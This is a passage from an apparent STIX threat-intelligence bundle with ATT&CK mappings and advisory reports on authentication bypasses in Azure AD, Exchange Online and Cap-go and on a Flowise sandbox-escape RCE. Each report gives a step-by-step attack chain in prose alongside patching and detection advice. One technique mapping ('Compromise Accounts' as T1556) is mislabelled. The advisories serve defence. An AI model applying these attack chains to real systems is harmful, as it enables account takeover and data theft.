          "url": "https://github.com/langflow-ai/langflow/pull/12945"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dcd21232-1a61-52bf-a398-0f3e8647f816",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2ebfc395-9750-5c81-b65e-e07b5add6726",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d32beea6-e43f-5a3d-ac9c-13b46ff3186c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2ebfc395-9750-5c81-b65e-e07b5add6726",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2ebfc395-9750-5c81-b65e-e07b5add6726",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical Azure AD Improper Authentication Vulnerability (CVE-2026-45480)",
      "description": "## Overview\n\nMicrosoft has disclosed a critical improper authentication vulnerability, CVE-2026-45480, affecting Azure Active Directory (Azure AD). This flaw allows an unauthorized attacker to bypass standard authentication processes and elevate their privileges across the network. With a CVSS v3.1 base score of 10.0, this vulnerability poses a severe risk, enabling attackers to gain unauthorized access to an organization's cloud identity infrastructure. Exploitation of this vulnerability could lead to comprehensive compromise of user accounts, administrative roles, and potentially all Azure-connected resources. This issue impacts organizations heavily reliant on Azure AD for identity and access management, demanding immediate attention to mitigate potential unauthorized access and control.\n\n## Attack Chain\n\n1.  **Initial Access**: An unauthorized attacker identifies an Azure Active Directory tenant as a target.\n2.  **Authentication Bypass (CVE-2026-45480)**: The attacker leverages the improper authentication vulnerability (CVE-2026-45480) to bypass standard authentication mechanisms, gaining initial access to an Azure AD user account without valid credentials.\n3.  **Unauthorized Session Establishment**: The attacker successfully establishes an unauthorized session within Azure AD, potentially masquerading as a legitimate user, possibly with low initial privileges.\n4.  **Privilege Escalation**: Utilizing the gained access or further exploiting the vulnerability, the attacker elevates the compromised account's privileges to a highly administrative role (e.g., Global Administrator, Application Administrator, or User Administrator) within Azure AD.\n5.  **Persistence Establishment**: With elevated privileges, the attacker creates new administrative accounts, modifies existing user roles, or registers malicious applications/service principals to maintain long-term access to the Azure AD environment.\n6.  **Lateral Movement and Resource Control**: The attacker, now possessing administrative control over Azure AD, can access, modify, or exfiltrate sensitive data from connected Azure resources, deploy malicious applications, or pivot to connected on-premises systems.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-45480 results in complete compromise of an organization's Azure Active Directory. Attackers can gain full administrative control, leading to unauthorized access to all cloud-based resources, sensitive data exfiltration, disruption of critical business operations, and the deployment of ransomware or other malicious payloads. The broad scope of Azure AD integration means that a compromise here can impact SaaS applications, on-premises applications, and all users managed by the directory. The potential for data breaches, service disruption, and reputational damage is extremely high.\n\n## Recommendation\n\n*   Immediately apply the security updates provided by Microsoft to address CVE-2026-45480, as detailed in the MSRC advisory: `https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45480`.\n*   Deploy the Sigma rules \"Detects CVE-2026-45480 Exploitation - Anomalous Azure AD Privileged Sign-in\" and \"Detects CVE-2026-45480 Exploitation - Azure AD Privileged Role Assignment\" to your SIEM solution to detect post-exploitation activity in `azure.signinlogs` and `azure.auditlogs`.\n*   Ensure Azure AD Identity Protection is enabled and configured to detect and respond to high-risk sign-ins, which could indicate attempts to exploit CVE-2026-45480.\n*   Regularly review Azure AD audit logs, specifically `azure.auditlogs` related to role assignments and application registrations, for any unauthorized changes.\n",
      "published": "2026-06-19T21:37:41Z",
      "labels": [
        "azure",
        "active-directory",
        "cve",
        "critical-vulnerability",
        "privilege-escalation",
        "authentication-bypass"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45480"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45480"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b7c69f26-9828-5b55-b7db-4529e999d6ff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c93aaad6-c026-5734-82c9-b5b5e77d9de5",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c93aaad6-c026-5734-82c9-b5b5e77d9de5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-48582: Microsoft Exchange Online Missing Authorization Privilege Elevation",
      "description": "## Overview\n\nMicrosoft has disclosed a critical missing authorization vulnerability, identified as CVE-2026-48582, affecting Microsoft Exchange Online. This vulnerability allows an attacker who has already gained authenticated access with low-level privileges to elevate those privileges over the network. The flaw, rated with a CVSS v3.1 score of 9.6, indicates a severe security risk, as successful exploitation could grant an unauthorized user administrative control or access to sensitive resources within an organization's Exchange Online environment. While details regarding specific exploitation methods are not yet public, defenders should assume attackers will attempt to leverage this flaw to gain deeper access and control once they establish an initial foothold. Organizations utilizing Exchange Online are strongly advised to monitor for updates and apply mitigations as soon as they become available.\n\n## Attack Chain\n\n1.  **Initial Access:** An attacker gains legitimate, but low-privileged, credentials to a Microsoft Exchange Online user account through methods such as phishing, credential stuffing, or brute-force attacks.\n2.  **Authenticated Access:** The attacker successfully authenticates to the Exchange Online service using the compromised credentials.\n3.  **Discovery of Vulnerable Endpoints:** The attacker actively or passively identifies specific administrative or sensitive endpoints and functions within Exchange Online that are vulnerable to authorization bypass.\n4.  **Exploitation (Missing Authorization):** The attacker crafts and sends a malicious network request to one of the identified privileged endpoints. Due to the missing authorization vulnerability (CVE-2026-48582), the service fails to correctly validate the attacker's low-level permissions for the requested privileged action.\n5.  **Privilege Elevation:** The Exchange Online service processes the attacker's request, inadvertently granting them elevated privileges, such as administrative rights over mailboxes, global settings, or other users' data.\n6.  **Post-Exploitation Actions:** With elevated privileges, the attacker proceeds to perform unauthorized actions, which may include accessing confidential mailboxes, modifying security settings, creating new administrator accounts, or exfiltrating sensitive data.\n7.  **Persistence:** The attacker may establish persistence within the compromised environment by creating new highly-privileged accounts or modifying existing configuration to maintain access even if initial access methods are discovered.\n8.  **Achieve Objective:** The attacker ultimately achieves their goal, which could range from data exfiltration and intellectual property theft to service disruption or further lateral movement within the broader organizational network.\n\n## Impact\n\nThe impact of successful exploitation of CVE-2026-48582 is severe, potentially leading to complete compromise of an organization's Microsoft Exchange Online environment. An authenticated attacker can gain administrative access, allowing them to read, modify, or delete any user's email, calendar, and contacts. This can result in significant data breaches, exposure of sensitive corporate communications, and regulatory non-compliance. Furthermore, the attacker could manipulate email rules, impersonate high-value targets, or facilitate phishing campaigns from trusted internal accounts, leading to further organizational compromise and reputational damage. While no specific victim count has been released, all organizations using Exchange Online are potentially vulnerable.\n\n## Recommendation\n\n*   Prioritize monitoring for any Microsoft security updates related to CVE-2026-48582 and apply patches immediately upon release.\n*   Deploy the Sigma rules in this brief to your SIEM/detection platform to identify anomalous administrative activity in Exchange Online.\n*   Review webserver access logs and proxy logs for `cs-uri-stem` patterns matching known Exchange administrative interfaces combined with unusual `cs-username` entries or successful `sc-status` codes for sensitive operations.\n*   Implement Multi-Factor Authentication (MFA) for all Exchange Online accounts, especially for administrative roles, to mitigate the impact of compromised credentials.\n*   Conduct regular audits of Exchange Online role assignments and permissions, looking for unexpected additions or modifications of administrative roles as identified by rules like \"Detect CVE-2026-48582 Exploitation - Successful Anomalous Admin Access\".\n",
      "published": "2026-06-19T21:38:55Z",
      "labels": [
        "privilege-escalation",
        "cloud",
        "microsoft",
        "exchange-online"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48582"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48582"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b96c845b-5152-593d-bab5-586aee00fc04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--51416d69-fc58-5ed9-b07d-f1669537c341",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--123affda-6f11-58dc-8db2-3ea6a4c43493",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Compromise Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1556",
          "url": "https://attack.mitre.org/techniques/T1556"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1dee9ea3-a372-5700-9e9a-dca3fdd382b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--51416d69-fc58-5ed9-b07d-f1669537c341",
      "target_ref": "attack-pattern--123affda-6f11-58dc-8db2-3ea6a4c43493"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--51416d69-fc58-5ed9-b07d-f1669537c341",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-56073: Cap-go OTP Verification Authentication Bypass",
      "description": "## Overview\n\nA critical authentication bypass vulnerability, identified as CVE-2026-56073, exists in Cap-go versions prior to 12.128.2. This flaw specifically affects the One-Time Password (OTP) and email verification processes, allowing malicious actors to circumvent these security controls. Attackers can intercept HTTP responses from the Cap-go server during an OTP or email verification attempt and modify them to falsely indicate successful verification. This manipulation tricks the client-side application (and potentially the server if it relies on client-reported state) into believing a valid OTP was provided. This enables unauthorized two-factor authentication (2FA) enablement or other sensitive account actions, with a high potential for full account takeover. The vulnerability has a CVSS v3.1 base score of 9.4, highlighting its severe impact and the urgent need for remediation.\n\n## Attack Chain\n\n1.  **Initial Access:** An attacker first gains access to a Cap-go user account, typically through compromised credentials (e.g., via phishing, credential stuffing, or leaked passwords).\n2.  **Initiate Verification Process:** The attacker (or a legitimate user whose session is under attack) attempts to perform an action requiring OTP or email verification, such as enabling 2FA, changing the account's primary email address, or resetting a password.\n3.  **Server Response Interception:** The Cap-go server sends an HTTP response to the client regarding the status of the OTP or email verification (e.g., indicating an invalid OTP, awaiting input, or an error). The attacker intercepts this response in transit, potentially via a Man-in-the-Middle (MiTM) attack, a compromised client, or by manipulating client-side logic.\n4.  **Response Manipulation:** The attacker modifies the intercepted HTTP response to falsely indicate a successful OTP or email verification, overriding the server's legitimate response. This manipulation occurs without providing a valid OTP or fulfilling the actual verification requirements.\n5.  **Forward Manipulated Response:** The attacker forwards the falsified HTTP response to the client application.\n6.  **Client-Side Processing:** The Cap-go client application receives and processes the manipulated response, erroneously believing that the OTP or email verification was legitimately successful.\n7.  **Unauthorized Action Request:** Based on the client's now \"verified\" state, the client sends subsequent HTTP requests to the Cap-go server to complete the sensitive action (e.g., confirming 2FA enablement, finalizing an email address change).\n8.  **Account Takeover:** The Cap-go server processes the client's request, and due to insufficient verification of the preceding OTP or email verification state (CWE-345), it grants the unauthorized 2FA enablement or account change, leading to full account takeover by the attacker.\n\n## Impact\n\nThe successful exploitation of CVE-2026-56073 leads to severe security consequences, primarily centered on unauthorized account access and potential account takeover. With a CVSS v3.1 base score of 9.4, the vulnerability poses a critical risk to the confidentiality, integrity, and availability of user accounts. Attackers can effectively bypass crucial multi-factor authentication mechanisms, gain complete control over compromised user accounts, and potentially access sensitive data or functionalities within the Cap-go environment. This could result in unauthorized data exfiltration, fraudulent transactions, or further compromise of integrated systems. Organizations utilizing affected Cap-go versions face substantial reputational damage, potential compliance violations, and direct financial losses due to widespread account compromises and data breaches.\n\n## Recommendation\n\n*   Immediately patch all Cap-go instances to version 12.128.2 or later to remediate CVE-2026-56073.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment, focusing on `/api/otp/verify`, `/api/email/verify`, `/api/2fa/enable`, and `/auth/update` endpoints.\n*   Implement strong network monitoring for unusual HTTP response modifications, particularly for authentication-related traffic, to detect potential Man-in-the-Middle attacks.\n*   Review web server and application logs for `HTTP POST` requests to sensitive account modification endpoints (e.g., `/api/2fa/enable`, `/api/user/email`) that exhibit anomalous client characteristics (e.g., suspicious User-Agents or Referers) or occur without a typical preceding authentication and OTP verification flow.\n",
      "published": "2026-06-19T22:26:05Z",
      "labels": [
        "authentication-bypass",
        "web-application",
        "vulnerability",
        "cap-go",
        "account-takeover",
        "cve",
        "network-attack"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--123affda-6f11-58dc-8db2-3ea6a4c43493"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56073"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/Cap-go/capgo/security/advisories/GHSA-x2gq-85v8-j9v4"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/cap-go-otp-bypass-via-response-manipulation-in-email-verification"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b9ef52f-dd35-5aaf-87e2-08603770dc30",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6fe12bb9-df48-59b1-b7d6-826ff3a2ce5c",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d4aa3e24-ac3d-5487-9ecf-14a5a054a4c4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6fe12bb9-df48-59b1-b7d6-826ff3a2ce5c",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6fe12bb9-df48-59b1-b7d6-826ff3a2ce5c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-56081: Cap-go Authentication Logic Flaw Leading to Account Takeover",
      "description": "## Overview\n\nA critical authentication logic flaw, identified as CVE-2026-56081, has been discovered in Cap-go versions released before 12.128.2. This vulnerability permits an attacker to exploit the registration process by binding an account to a victim's unverified email address. The core of the issue lies in Cap-go's failure to adequately validate email ownership during the initial account creation phase. By leveraging this flaw, an attacker can then proceed to enable multi-factor authentication (MFA) on the newly created, victim-email-bound account. This action effectively locks out the legitimate user, granting the attacker full control over the account, enabling them to manipulate sensitive data, enforce arbitrary organization-level policies, and conduct further malicious activities within the Cap-go platform. This flaw represents a severe threat to data integrity and user access control for organizations utilizing affected Cap-go installations.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An attacker identifies a target user's email address and determines it is either not yet registered with Cap-go or registered but email verification is pending.\n2.  **Malicious Registration**: The attacker initiates a new account registration on the vulnerable Cap-go instance (version \u003c 12.128.2) using the victim's email address.\n3.  **Exploitation of Logic Flaw**: Due to the vulnerability (CVE-2026-56081), Cap-go's authentication system allows the creation of this new account linked to the victim's email without requiring immediate ownership verification.\n4.  **2FA Enrollment**: The attacker, while logged into the newly created unverified account, immediately configures and enables their own multi-factor authentication (MFA) method (e.g., an authenticator app) for that account.\n5.  **Account Takeover**: The legitimate user later attempts to register or log in using their email. During this process, they are prompted for email verification.\n6.  **Denial of Service**: Upon successful email verification by the legitimate user, the system attempts to merge or associate the verified email with an existing account. However, since the attacker has already enabled 2FA on the account bound to that email, the legitimate user is denied access to their own account.\n7.  **Post-Exploitation Control**: With full control over the compromised account, the attacker can now read, modify, or delete the victim's data, and potentially enforce organization-level policies within the Cap-go platform.\n\n## Impact\n\nThe successful exploitation of CVE-2026-56081 results in a complete account takeover for the targeted victim. Attackers gain unauthorized access to all data associated with the compromised Cap-go account, including the ability to read, modify, or delete sensitive information. Furthermore, attackers can enforce organization-level policies, potentially disrupting business operations or leading to further compromise of integrated systems. This flaw leads to a denial of access for the legitimate user, severely impacting their ability to utilize the platform and exposing their data to malicious manipulation. The CVSS v3.1 Base Score of 9.1 highlights the critical severity of this vulnerability.\n\n## Recommendation\n\n*   **Patch CVE-2026-56081**: Immediately upgrade all Cap-go installations to version 12.128.2 or newer to remediate CVE-2026-56081.\n*   **Implement Application Logging**: Ensure Cap-go application logs are configured to capture events related to account registration, email verification status, and 2FA enablement, including the source IP address.\n*   **Deploy Sigma Rules**: Deploy the provided Sigma rules to your SIEM solution and monitor for potential reconnaissance and suspicious account manipulation attempts.\n*   **Monitor Failed Login Attempts**: Actively monitor for unusual spikes in failed login attempts associated with legitimate user accounts, which may indicate account takeover attempts.\n",
      "published": "2026-06-19T22:27:23Z",
      "labels": [
        "account-takeover",
        "authentication-bypass",
        "web-application",
        "logic-flaw",
        "cloud"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56081"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--730f50be-56f7-5d3f-b966-3318ad1e914a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bed886e2-2b02-52cd-a9ca-e2da7eb5da3f",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--affb3fa1-695d-55dc-8e28-1427358a4354",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bed886e2-2b02-52cd-a9ca-e2da7eb5da3f",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0afac19b-feb8-5ddb-97bf-5fb4d328a679",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bed886e2-2b02-52cd-a9ca-e2da7eb5da3f",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--902f9b1c-6e8a-59a2-893a-7e48c65a35f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bed886e2-2b02-52cd-a9ca-e2da7eb5da3f",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--79905bf8-c5c2-5a90-88cc-562925780b8b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bed886e2-2b02-52cd-a9ca-e2da7eb5da3f",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b1309cc6-ebe5-556c-8748-e5b839966a0c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bed886e2-2b02-52cd-a9ca-e2da7eb5da3f",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bed886e2-2b02-52cd-a9ca-e2da7eb5da3f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2024-58351: Flowise Remote Code Execution via Configuration Injection",
      "description": "## Overview\n\nFlowise versions prior to 2.1.4 are affected by CVE-2024-58351, a critical vulnerability allowing configuration injection leading to remote code execution (RCE) and sandbox escape. This flaw stems from the `overrideConfig` option, available in both the frontend web integration and the backend Prediction API, which is enabled by default without an allow-list for variables. Attackers can exploit this by injecting malicious configurations that bypass the `vm2` sandbox, designed to isolate untrusted code. Successful exploitation grants the attacker the ability to execute arbitrary code on the underlying server, perform denial of service, conduct server-side request forgery (SSRF), inject prompts, and exfiltrate sensitive server data and variables. This vulnerability specifically impacts the Flowise instance under attack and does not inherently persist to other users.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker identifies a vulnerable Flowise instance exposing its frontend web integration or backend Prediction API (e.g., `/api/v1/prediction`, `/api/v1/chat`).\n2.  **Configuration Injection**: The attacker sends a crafted HTTP POST request to a vulnerable endpoint, embedding malicious JavaScript code or commands within the `overrideConfig` option.\n3.  **VM2 Sandbox Bypass**: The injected configuration exploits known vulnerabilities or bypass techniques within the `vm2` JavaScript sandbox, which Flowise relies on for code isolation.\n4.  **Remote Code Execution**: The successful sandbox bypass allows the attacker to execute arbitrary operating system commands on the underlying server, breaking out of the confined `vm2` environment.\n5.  **Impactful Actions**: The executed commands perform various malicious activities such as reading sensitive environment variables (e.g., `process.env`), accessing local system files (e.g., `/etc/passwd`), initiating Server-Side Request Forgery (SSRF) to internal network resources, or causing a Denial of Service (DoS) by crashing the Node.js process.\n6.  **Data Exfiltration**: If successful in reading sensitive data, the attacker may then exfiltrate this information to an external, attacker-controlled server.\n\n## Impact\n\nSuccessful exploitation of CVE-2024-58351 can lead to a complete compromise of the Flowise server. Attackers can achieve remote code execution, allowing them to gain full control over the affected system. This includes the ability to steal sensitive data, modify system configurations, disrupt services through denial of service attacks, or pivot to other systems within the network via server-side request forgery. While the advisory notes these issues are \"self-targeted\" and do not persist to other users, the impact on the compromised Flowise instance and the data it processes is severe, potentially leading to significant data breaches or operational disruptions.\n\n## Recommendation\n\n*   Immediately upgrade Flowise to version 2.1.4 or higher to patch CVE-2024-58351.\n*   Deploy the Sigma rule \"Detects CVE-2024-58351 Exploitation - Flowise Configuration Injection Attempt\" to your web server logs to identify suspicious `overrideConfig` usage.\n*   Deploy the Sigma rule \"Detects CVE-2024-58351 Exploitation - Suspicious Process Creation Post-RCE\" to your endpoint detection and response (EDR) or system logs (e.g., Sysmon, Auditd) to detect post-exploitation activity.\n*   Enable comprehensive logging for web server access (e.g., HTTP request bodies, URIs) and process creation events on servers hosting Flowise instances.\n",
      "published": "2026-06-20T16:25:35Z",
      "labels": [
        "web-vulnerability",
        "rce",
        "sandbox-escape",
        "node.js",
        "configuration-injection"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-58351"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4b128b42-1eea-5f4c-9d82-2251c5dcc515",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2799bbdc-7d81-5f95-a70b-bd525e753d8b",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
